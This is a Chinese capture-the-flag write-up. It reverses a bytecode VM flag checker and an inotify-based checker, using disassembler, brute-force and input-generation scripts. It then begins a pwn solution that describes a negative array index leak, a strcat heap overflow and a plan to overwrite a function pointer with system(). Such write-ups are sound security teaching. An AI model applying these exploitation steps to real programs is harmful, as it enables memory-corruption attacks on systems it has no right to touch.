0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000006, 0x00000007, 0x0000000B, 0x00000005, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000000, 0x00000006, 0x0000000F, 0x0000000B, 0x00000003, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000001, 0x00000006, 0x00000017, 0x0000000B, 0x00000001, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000002, 0x00000006, 0x00000023, 0x0000000B, 0x00000008, 0x00000007, 0x00000004, 0x00000001, 0x00000008, 0x00000003, 0x00000009, 0x00000003, 0x000001EB, 0x00000004, 0x00000002, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000005, 0x0000000A, 0x00000003, 0x00000081, 0x00000004, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000005, 0x0000000C, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]

class disasm:
    def __init__(self, bytecode) -> None:
        self.bytecode = bytecode

    def addr_transfer(self, addr):
        return "_" + hex(addr)[2:]

    def disasm(self):
        pc = 0
        all_asm = ''
        while pc < 3828:
            opcode = self.bytecode[pc]
            asm_text = ''
            if opcode == 1:
                asm_text = "%s: reg_char = Memory[reg_addr]" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 2:
                asm_text = '%s:  puts("Checking flag...");' % self.addr_transfer(pc)
                pc += 1
            elif opcode == 3:
                asm_text = "%s: reg_int = %d" % (self.addr_transfer(pc), self.bytecode[pc + 1])
                pc += 2
            elif opcode == 4:
                asm_text = """%s:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;""" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 5:
                asm_text = "%s: reg_int += 1" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 6:
                # reg_char = flag[bytecode[i + 1]];
                asm_text = "%s: reg_char = flag[%d]" % (self.addr_transfer(pc), self.bytecode[pc + 1])
                pc += 2
            elif opcode == 7:
                asm_text = "%s: reg_int = reg_char" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 8:
                asm_text = "%s: buffer[%d] = reg_char" % (self.addr_transfer(pc), self.bytecode[pc + 1])
                pc += 2
            elif opcode == 9:
                asm_text = """%s:
buffer2 = malloc(0xC8uLL);
buffer2 = sub_117B(buffer);
v9 = 0;
buffer = malloc(5uLL);""" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 10:
                asm_text = """%s: 
if ( Memory[reg_int] != buffer2[v9]) )
    v6 = 10;
++v9;""" % self.addr_transfer(pc)
                pc += 1
            elif opcode == 11:
                asm_text = "%s: if ((char)(reg_char %% 9) != %d) v6 = 10;" % (self.addr_transfer(pc), self.bytecode[pc + 1])
                pc += 2
            elif opcode == 12:
                asm_text = "%s: putchar(Memory[reg_int + v6])" % self.addr_transfer(pc)
                pc += 1
            else:
                print(opcode, pc)
            asm_text += ";\n"
            all_asm += asm_text
        open("result.cpp", "w").write(all_asm)
dis = disasm(bytecode)
dis.disasm()

得到反编译结果如下 (片段)

_0: reg_char = flag[0];
_2: if ((char)(reg_char % 9) != 6) v6 = 10;;
_4: reg_int = reg_char;
_5:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr
_6: reg_char = Memory[reg_addr];
_7: buffer[0] = reg_char;

_9: reg_char = flag[8];
_b: if ((char)(reg_char % 9) != 5) v6 = 10;;
_d: reg_int = reg_char;
_e:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_f: reg_char = Memory[reg_addr];
_10: buffer[1] = reg_char;
_12: reg_char = flag[16];
_14: if ((char)(reg_char % 9) != 8) v6 = 10;;
_16: reg_int = reg_char;
_17:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_18: reg_char = Memory[reg_addr];
_19: buffer[2] = reg_char;
_1b: reg_char = flag[24];
_1d: if ((char)(reg_char % 9) != 3) v6 = 10;;
_1f: reg_int = reg_char;
_20:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_21: reg_char = Memory[reg_addr];
_22: buffer[3] = reg_char;
_24: reg_char = flag[31];
_26: if ((char)(reg_char % 9) != 3) v6 = 10;;
_28: reg_int = reg_char;
_29:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_2a: reg_char = Memory[reg_addr];
_2b: buffer[4] = reg_char;
_2d:
buffer2 = malloc(0xC8uLL);
buffer2 = sub_117B(buffer);
v9 = 0;
buffer = malloc(5uLL);;
_2e: reg_int = 140;
_30:
v3 = base64(reg_int, dest, 10);
strcpy(dest, v3);
reg_addr = strtol(dest, 0LL, 16);
reg_int = reg_addr;;
_31:  puts("Checking flag...");;
_32: 
if ( Memory[reg_int] != buffer2[v9]) )

这是一组数据的验证,一共有 8 组这样的验证,一共验证 flag 36 个字符。

这一组验证中,flag [x] 经过变换得到 buffer [n] 且 需要满足模数条件, 一组 buffer 计算完成后调用 sub_117B 进一步计算,最终再把该函数的返回值与目标数据比较。

flag[x] 到 buffer[n] 不是唯一映射, 所以有模数限制。

映射关系如下

// Input: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
// Output:8472001712585036770886014270876835165635f3254476f3554f516ff338

sub_117B 的输入是4个字符或5个字符,字符集为0 - 8

这个函数利用 fork 实现递归,简单 patch 后进行爆破即可

from pwn import *
import json
import os
from multiprocessing.dummy import Pool as ThreadPool

threads = 10

tasks2 = [[] for i in range(threads)]
tresult = []
def RunT2(n):
    for m in tasks2[n]:
        while True:
            try:
                p = process("/home/pandaos/Desktop/fuck/f%d/flagchecker1" % n, cwd = "/home/pandaos/Desktop/fuck/f%d/" % n)
                try:
                    path = "/home/pandaos/Desktop/fuck/f%d/check" % n
                    if os.path.exists(path):
                        os.remove(path)
                except Exception:
                    pass
                p.sendline(m.encode("ascii"))
                data = p.recvline()
                if b'Can' in data or b'Cannot' in data:
                    raise
                break
            except Exception:
                continue
            finally:
                p.close()

        tresult.append((m, data))


fuck_table = '012345678'
i = [0] * 5
data_map = dict()
tasks = []
k = 0
tmp_task = []
for i[0] in fuck_table:
    for i[1] in fuck_table:
        for i[2] in fuck_table:
            for i[3] in fuck_table:
                for i[4] in fuck_table:
                    test = "".join(i)
                    tasks.append((test, k % 10))
                    tasks2[k % 10].append(test)      
                    k += 1

mythreads = []
for i in range(threads):
    th = threading.Thread(target=RunT2, args=(i, ))
    th.start()
    mythreads.append(th)

for th in mythreads:
    th.join()

print(tresult)
open("ffk.json", "w").write(str(tresult))

提取比较数据后在爆破结果中查找对应的输入

比较数据与对应的 sub_117B 输入参数

84721
234231224221234231224221233423312324232124342431242424212434243124242421243342433124324243212342312242212342312242212334233123242321343124213431242133433132432143443142442143443142442143344331432443213431242134312421334331324321

1138
44244442444432443442444452445412414124141324134124141524151421414214143214314214145214511211112111132113112111152115

80481
224221242124242421244241224221242125242521254251254242542125442541252425212542512242212421242424212442412242212421242141424421444124214152452154515424542154454152452154512421414244214441242141

224262646622426264663232432632633436362242626466224262646632324326326334363632324326326334363632324326326334363633233243326332633334336336

57518
444244444124414342434431243145424544512451444244444124414342434431243145424544512451434424344434124341433424334433124331435424354435124351344234434123413342334331233135423543512351344234434123413342334331233135423543512351334423344334123341333423334333123331335423354335123351544254454125415342534531253155425545512551544254454125415342534531253155425545512551534425344534125341533425334533125331535425354535125351

343335344343345343335344343345344434433445344343345343335344343345343335242325244243245242325244243245244424432445244243245242325244243245242325

02162
34334234433442346334623463346231331231433142316331623163316224324224432442246324622463246221321221432142216321622163216253435342534435344253463534625346353462531353125314353142531635316253163531625243524252443524425246352462524635246252135212521435214252163521625216352162343342344334423463346234633462313312314331423163316231633162243242244324422463246224632462213212214321422163216221632162

1854
424424442442342344234254254425444444443434434545445124124412412312341231251254125141441413134131515415

最后计算 flag

flag = [0] * 36

t1 = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>[email protected][\]^_`{|}~'
t2 = '80230103415684857787827121576760008653455327627513233564681454fffffff3003058723412112363462845'


dict_data = {}
for i in range(len(t2)):
    if t2[i] not in dict_data:
        dict_data[t2[i]] = []
    dict_data[t2[i]] += t1[i]
print(dict_data)


def mrev(ch, idx):
    tt = '658332610045238537383836556104255318'
    for x in dict_data[ch]:
        if ord(x) % 9 == int(tt[idx]):
            return x
    raise

#84721
flag[0]  = mrev('8', 0)
flag[8]  = mrev('4', 1)
flag[16] = mrev('7', 2)
flag[24] = mrev('2', 3)
flag[31] = mrev('1', 4)

#1138
flag[1] =  mrev('1', 5)
flag[9] =  mrev('1', 6)
flag[17] = mrev('3', 7)
flag[25] = mrev('8', 8)

#80481
flag[2]  = mrev('8', 9)
flag[10] = mrev('0', 10)
flag[18] = mrev('4', 11)
flag[26] = mrev('8', 12)
flag[32] = mrev('1', 13)

#7786
flag[3]  = mrev('7', 14)
flag[11] = mrev('7', 15)
flag[19] = mrev('8', 16)
flag[27] = mrev('6', 17)

#57518
flag[4]  = mrev('5', 18)
flag[12] = mrev('7', 19)
flag[20] = mrev('5', 20)
flag[28] = mrev('1', 21)
flag[33] = mrev('8', 22)

#2445
flag[5]  = mrev('2', 23)
flag[13] = mrev('4', 24)
flag[21] = mrev('4', 25)
flag[29] = mrev('5', 26)

#02162
flag[6]  = mrev('0', 27)
flag[14] = mrev('2', 28)
flag[22] = mrev('1', 29)
flag[30] = mrev('6', 30)
flag[34] = mrev('2', 31)

#1854
flag[7]  = mrev('1', 32)
flag[15] = mrev('8', 33)
flag[23] = mrev('5', 34)
flag[35] = mrev('4', 35)
print(flag)

总结一下,这道题逻辑比较简单,提取数据过程比较繁琐,适合用来练习调试技巧与IDA脚本的编写。

noodes

比较的地方

if ( !strcmp(
          s1,
          "dfxXdf5FcwL\\adsUddPedd}UdflZafn~af9TmflZcwlZafilddKYafM^dfxRmfENcwENddXmdf\\Raff\\df{xddL[adeiadJkdfW5cwiTdd7"
          "Ydf^zadkKcw:jadeudfU=dfj~dd[}dfM9cwp7dfhnmfTjcwTjddyQdfftdd5UdfIxddGydfgnddjYdfqZcwqPcwfpdflLddUoaf~vddWqafZJd"
          "f=Tcw{Zmf|Fcw|FddnkadUgdfj\\dfr^dd]SdfGJcwwJdfFtcwzFcwXVcwE|cwkPddWMdd]iadu:cwFRad\\IafXrafNxmfElcwElafJvafx9d"
          "f4|dd8mmfH~cwH~mfT~cwT~afkFafvpdfj5dd}SafVRmfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\\xcw=7cwyncwG|cwThcwNLcw\\pcwI^cw5ZcwOT") )

s1的生成

v45 = __readfsqword(0x28u);
  index = 0;
  s_index = 0;
  sub_55D31246E16A();
  sub_55D31246E1FA();
  fd = inotify_init();   //初始化一个 inotify 实例
  if ( fd < 0 )
    perror("inotify_init");
  sub_55D31246E4B7("/tmp/chall/"); //初始化文件
  wd = inotify_add_watch(fd, "/tmp/chall/", 0x33Fu); // 将监视添加到初始化的 inotify 实例
  pid = fork(); //新建进程
  if ( !pid )
    sub_55D31246E668("/tmp/chall/");   //用户输入处理,文件变动
  if ( waitpid(pid, &stat_loc, 0) == -1 )
  {
    perror("waitpid failed\n");
    goto LABEL_35;
  }
  v40 = BYTE1(stat_loc);
  printf("%d", BYTE1(stat_loc));
size = read(fd, buf, 0x8000uLL);
  if ( size < 0 )
    perror("read");
  while ( index < size )
  {
    byte = &buf[index];
    if ( !*((_DWORD *)byte + 3) )
      goto LABEL_30;
    if ( (*((_DWORD *)byte + 1) & 0x100) != 0 ) // IN_CREATE 
    {
      v3 = s_index;
      if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )// IN_ISDIR
      {
        ++s_index;
        s1[v3] = 'c';
        v4 = s_index++;
        s1[v4] = 'd';
      }
      else
      {
        ++s_index;
        s1[v3] = 'c';
        v5 = s_index++;
        s1[v5] = 'f';
      }
LABEL_26:
      v23 = byte[16] + 4;
      v24 = s_index++;
      s1[v24] = v23;
      v25 = byte[17] + 4;
      v26 = s_index++;
      s1[v26] = v25;
      goto LABEL_30;
    }
    if ( (*((_DWORD *)byte + 1) & 0x200) != 0 ) // IN_DELETE   
    {
      v6 = s_index;
      if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
      {
        ++s_index;
        s1[v6] = 'd';
        v7 = s_index++;
        s1[v7] = 'd';
      }
      else
      {
        ++s_index;
        s1[v6] = 'd';
        v8 = s_index++;
        s1[v8] = 'f';
      }
      goto LABEL_26;
    }
    if ( (*((_DWORD *)byte + 1) & 8) != 0 )     // IN_CLOSE_WRITE
    {
      v9 = s_index++;
      s1[v9] = 'c';
      v10 = s_index++;
      s1[v10] = 'w';
      v11 = byte[16] + 4;
      v12 = s_index++;
      s1[v12] = v11;
      v13 = byte[17] + 4;
      v14 = s_index++;
      s1[v14] = v13;
      goto LABEL_30;
    }
    if ( (*((_DWORD *)byte + 1) & 1) != 0 )     // IN_ACCESS
    {
      v15 = s_index++;
      s1[v15] = 'a';
      v16 = s_index++;
      s1[v16] = 'c';
      v17 = byte[16] + 4;
      v18 = s_index++;
      s1[v18] = v17;
      v19 = byte[17] + 4;
      v20 = s_index++;
      s1[v20] = v19;
      goto LABEL_30;
    }
    if ( (*((_DWORD *)byte + 1) & 4) != 0 )     // IN_ATTRIB 
    {
      v21 = s_index;
      if ( (*((_DWORD *)byte + 1) & 0x40000000) != 0 )
      {
        ++s_index;
        s1[v21] = 'a';
        v22 = s_index++;
        s1[v22] = 'd';
      }
      else
      {
        ++s_index;
        s1[v21] = 'a';
        v27 = s_index++;
        s1[v27] = 'f';
      }
      goto LABEL_26;
    }
    if ( (*((_DWORD *)byte + 1) & 2) != 0 )     // IN_MODIFY
    {
      v28 = s_index++;
      s1[v28] = 'm';
      v29 = s_index++;
      s1[v29] = 'f';
      v30 = byte[16] + 4;
      v31 = s_index++;
      s1[v31] = v30;
      v32 = byte[17] + 4;
      v33 = s_index++;
      s1[v33] = v32;
    }
LABEL_30:
    index += *((_DWORD *)byte + 3) + 16;
  }

inotify

这个感觉和git有点点像, 监控文件的变动, 变动会生成事件

struct inotify_event {
    int      wd;       /* Watch descriptor */
    uint32_t mask;     /* Mask of events */
    uint32_t cookie;   /* Unique cookie associating related
                          events (for rename(2)) */
    uint32_t len;      /* Size of name field */
    char     name[];   /* Optional null-terminated name */
};

这里涉及的事件

IN_ACCESS   0x00000001  
文件被访问(读取)(*)。
IN_CLOSE_WRITE   0x00000008
为写入而打开的文件已关闭 (*)。
IN_ATTRIB         0x00000004  
权限修改
IN_ISDIR         0x40000000
事件的目标是文件夹
IN_CREATE         0x00000100  
有新文件产生(可能是目录)
IN_DELETE         0x00000200
有文件被删除(可能是目录)
IN_MODIFY         0x00000002
修改文件

这里4字节长度刚好对应index += *((_DWORD *)byte + 3) + 16;的加16

处理输入

1: stream[v3] = fopen(dest, "a+");
2: fclose(stream[--v9]);//生成cw
3: fwrite("Wrong", 1uLL, 5uLL, stream[v9 - 1]);//生成mf 
4: unlink(dest);//生成df
5: chmod(dest, 0x164u);//生成af
6: rmdir(dest);//生成dd
7: mkdir(dest, 0x1C0u);//生成cd
8:exit(0)

除了2,3不能有名称之外都有2字节的名称

分析比较字符串

这里的字符串没有新建操作, 前面的文件初始化已经完成了(监控开启之前)

注意:df之后不能再打开文件, 否则会出现新建操作,(这里有一处就是这样df之后才mf的, 这里应该再df之前就打开, 我把这个操作放在了最前面, mf之前和cw之前一定要打开文件指针, 打开操作只需要一次, (mf, cw相同的文件只打开一次, 每次mf都会有cw收尾), exit会关闭所有的文件指针(这里也会被记录, 后打开的先关闭)

生成输入脚本: (因为mf操作不多, 我就直接手动删除多余的新建操作, 最后再加个8)

#include<iostream>

using namespace std;

int main()
{
    char a[437] = {
    0x64, 0x66, 0x78, 0x58, 0x64, 0x66, 0x35, 0x46, 0x63, 0x77, 0x4C, 0x5C, 0x61, 0x64, 0x73, 0x55, 
    0x64, 0x64, 0x50, 0x65, 0x64, 0x64, 0x7D, 0x55, 0x64, 0x66, 0x6C, 0x5A, 0x61, 0x66, 0x6E, 0x7E, 
    0x61, 0x66, 0x39, 0x54, 0x6D, 0x66, 0x6C, 0x5A, 0x63, 0x77, 0x6C, 0x5A, 0x61, 0x66, 0x69, 0x6C, 
    0x64, 0x64, 0x4B, 0x59, 0x61, 0x66, 0x4D, 0x5E, 0x64, 0x66, 0x78, 0x52, 0x6D, 0x66, 0x45, 0x4E, 
    0x63, 0x77, 0x45, 0x4E, 0x64, 0x64, 0x58, 0x6D, 0x64, 0x66, 0x5C, 0x52, 0x61, 0x66, 0x66, 0x5C, 
    0x64, 0x66, 0x7B, 0x78, 0x64, 0x64, 0x4C, 0x5B, 0x61, 0x64, 0x65, 0x69, 0x61, 0x64, 0x4A, 0x6B, 
    0x64, 0x66, 0x57, 0x35, 0x63, 0x77, 0x69, 0x54, 0x64, 0x64, 0x37, 0x59, 0x64, 0x66, 0x5E, 0x7A, 
    0x61, 0x64, 0x6B, 0x4B, 0x63, 0x77, 0x3A, 0x6A, 0x61, 0x64, 0x65, 0x75, 0x64, 0x66, 0x55, 0x3D, 
    0x64, 0x66, 0x6A, 0x7E, 0x64, 0x64, 0x5B, 0x7D, 0x64, 0x66, 0x4D, 0x39, 0x63, 0x77, 0x70, 0x37, 
    0x64, 0x66, 0x68, 0x6E, 0x6D, 0x66, 0x54, 0x6A, 0x63, 0x77, 0x54, 0x6A, 0x64, 0x64, 0x79, 0x51, 
    0x64, 0x66, 0x66, 0x74, 0x64, 0x64, 0x35, 0x55, 0x64, 0x66, 0x49, 0x78, 0x64, 0x64, 0x47, 0x79, 
    0x64, 0x66, 0x67, 0x6E, 0x64, 0x64, 0x6A, 0x59, 0x64, 0x66, 0x71, 0x5A, 0x63, 0x77, 0x71, 0x50, 
    0x63, 0x77, 0x66, 0x70, 0x64, 0x66, 0x6C, 0x4C, 0x64, 0x64, 0x55, 0x6F, 0x61, 0x66, 0x7E, 0x76, 
    0x64, 0x64, 0x57, 0x71, 0x61, 0x66, 0x5A, 0x4A, 0x64, 0x66, 0x3D, 0x54, 0x63, 0x77, 0x7B, 0x5A, 
    0x6D, 0x66, 0x7C, 0x46, 0x63, 0x77, 0x7C, 0x46, 0x64, 0x64, 0x6E, 0x6B, 0x61, 0x64, 0x55, 0x67, 
    0x64, 0x66, 0x6A, 0x5C, 0x64, 0x66, 0x72, 0x5E, 0x64, 0x64, 0x5D, 0x53, 0x64, 0x66, 0x47, 0x4A, 
    0x63, 0x77, 0x77, 0x4A, 0x64, 0x66, 0x46, 0x74, 0x63, 0x77, 0x7A, 0x46, 0x63, 0x77, 0x58, 0x56, 
    0x63, 0x77, 0x45, 0x7C, 0x63, 0x77, 0x6B, 0x50, 0x64, 0x64, 0x57, 0x4D, 0x64, 0x64, 0x5D, 0x69, 
    0x61, 0x64, 0x75, 0x3A, 0x63, 0x77, 0x46, 0x52, 0x61, 0x64, 0x5C, 0x49, 0x61, 0x66, 0x58, 0x72, 
    0x61, 0x66, 0x4E, 0x78, 0x6D, 0x66, 0x45, 0x6C, 0x63, 0x77, 0x45, 0x6C, 0x61, 0x66, 0x4A, 0x76, 
    0x61, 0x66, 0x78, 0x39, 0x64, 0x66, 0x34, 0x7C, 0x64, 0x64, 0x38, 0x6D, 0x6D, 0x66, 0x48, 0x7E, 
    0x63, 0x77, 0x48, 0x7E, 0x6D, 0x66, 0x54, 0x7E, 0x63, 0x77, 0x54, 0x7E, 0x61, 0x66, 0x6B, 0x46, 
    0x61, 0x66, 0x76, 0x70, 0x64, 0x66, 0x6A, 0x35, 0x64, 0x64, 0x7D, 0x53, 0x61, 0x66, 0x56, 0x52, 
    0x6D, 0x66, 0x46, 0x70, 0x6D, 0x66, 0x50, 0x7C, 0x6D, 0x66, 0x54, 0x68, 0x6D, 0x66, 0x4E, 0x4C, 
    0x6D, 0x66, 0x35, 0x5A, 0x63, 0x77, 0x46, 0x70, 0x63, 0x77, 0x50, 0x7C, 0x63, 0x77, 0x5C, 0x78, 
    0x63, 0x77, 0x3D, 0x37, 0x63, 0x77, 0x79, 0x6E, 0x63, 0x77, 0x47, 0x7C, 0x63, 0x77, 0x54, 0x68, 
    0x63, 0x77, 0x4E, 0x4C, 0x63, 0x77, 0x5C, 0x70, 0x63, 0x77, 0x49, 0x5E, 0x63, 0x77, 0x35, 0x5A, 
    0x63, 0x77, 0x4F, 0x54, 0x00
    };
    for (int i = 0; i < 437; i += 4)
    {
        if (a[i] == 'c' && a[i + 1] == 'f')
            cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
        else if (a[i] == 'c' && a[i + 1] == 'w')
            cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4)) << "2";
        else if (a[i] == 'm' && a[i + 1] == 'f')
            cout << "1" << char((a[i + 2] - 4)) << char((a[i + 3] - 4)) << "3";
        else if (a[i] == 'd' && a[i + 1] == 'f')
            cout << "4" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
        else if (a[i] == 'a' && a[i + 1] == 'f')
            cout << "5" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
        else if (a[i] == 'a' && a[i + 1] == 'd')
            cout << "5" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
        else if (a[i] == 'd' && a[i + 1] == 'd')
            cout << "6" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
        else if (a[i] == 'c' && a[i + 1] == 'd')
            cout << "7" << char((a[i + 2] - 4)) << char((a[i + 3] - 4));
    }
    system("pause");
}

得到1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN1Bl31Lx31Pd31JH311V3221Xt219321uj21Cx2221Xl21EZ221KP28

最后输入发现有错误, 调试之后发现, 从SafVR之后开始, 这里完全倒了过来,

要求的s1:mfFpmfP|mfThmfNLmf5ZcwFpcwP|cw\xcw=7cwyncwG|cwThcwNLcw\pcwI^cw5ZcwOT

生成的s1:mf5Zcw5ZmfNLcwNLcw\xcw=7cwyncwG|mfThcwThmfP|cwP|cw\pcwI^mfFpcwFpcwOT

具体调试了函数之后(前面有一个闹钟记得patch掉), 这里mf之后并没有把字符串写入, 是在fclose文件指针之后把文件修改, 那到底怎么连续修改之后再关闭文件指针呢, 这里我试了一下exit来关闭文件指针,把输入后面改成:

1hV4tT41B1HX25oQ6La6yQ4hV5jz55P325eh6GU5IZ4tN1AJ326Ti4XN5bX4wt6HW5ae5Fg4S11eP263U4Zv5gG16f25aq4Q94fz6Wy4I51l324dj1Pf326uM4bp61Q4Et6Cu4cj6fU4mV1mL21bl24hH6Qk5zr6Sm5VF49P1wV21xB326jg5Qc4fX4nZ6YO4CF1sF24Bp1vB21TR21Ax21gL26SI6Ye5q61BN25XE5Tn5Jt1Ah325Fr5t540x64i1Dz321Pz325gB5rl4f16yO5RN(这里开始修改)

1KP11V31EZ1Xl1JH31Pd31Cx1uj1931Xt1Lx31Bl38, 成功得到flag

pwn

Ancient_House

比较特殊的漏洞利用相关的点有以下三个,

p_func堆块内保存函数指针

程序在最开始设置p_func, 然后最后又进行调用,

inctf解题paper

inctf解题paper

inctf解题paper

通过汇编层的查看我们可以知道, 这个堆块p_func中, p_func[0]为函数地址, p_func[1]为函数参数1, 而且程序给了system函数地址, 我们的目标应该就是覆写这个p_func堆块,

负数数组越界

在batter功能中, 输入idx的时候没有经过什么校验, 存在一个负数数组越界的问题,

通过这个漏洞我们可以往上查找到chunklist前面的地址, 进行数据泄漏和修改,

inctf解题paper

而且要是保存地址内数据还是一个name地址,

最后我们找到了这里, 这个位置在曾经也被用作数据泄漏, 他是一个指向自己的指针, 这样我们可以把这个地址泄漏出来, 得到pie的偏移量.

inctf解题paper

值得注意的另一个点是, max_chunks在他后面, 并且恰好是chunk_list[idx]->health的位置, 计算后得到一个负数(5-15=-10),

并且因为这个max_chunks数据是一个unsigned int 类型数据, 在add中的数量限制也被解除了,

inctf解题paper

my_strcat堆溢出

这个是后面才发现的漏洞, 这个点卡住了很久,

在两个人物合并的时候, 会对他们的名字进行一次拼接, 这时候调用了my_strcat函数:

inctf解题paper

inctf解题paper

这里值得注意的是循环赋值里面, buf2内容赋值给buf1, 但是复制的长度却是buf1_size+buf2_size, 这里构造了一个溢出,

于是可以多写入buf2后面的一段内容, 这段内容我们也可以通过堆风水来构造,
利用
开始使用时, 内存布局,

size: addr-$heap_base

0x10: 0x6000 
0x40: 0x7000
0x50: 0x8000
0x20: 0xa000

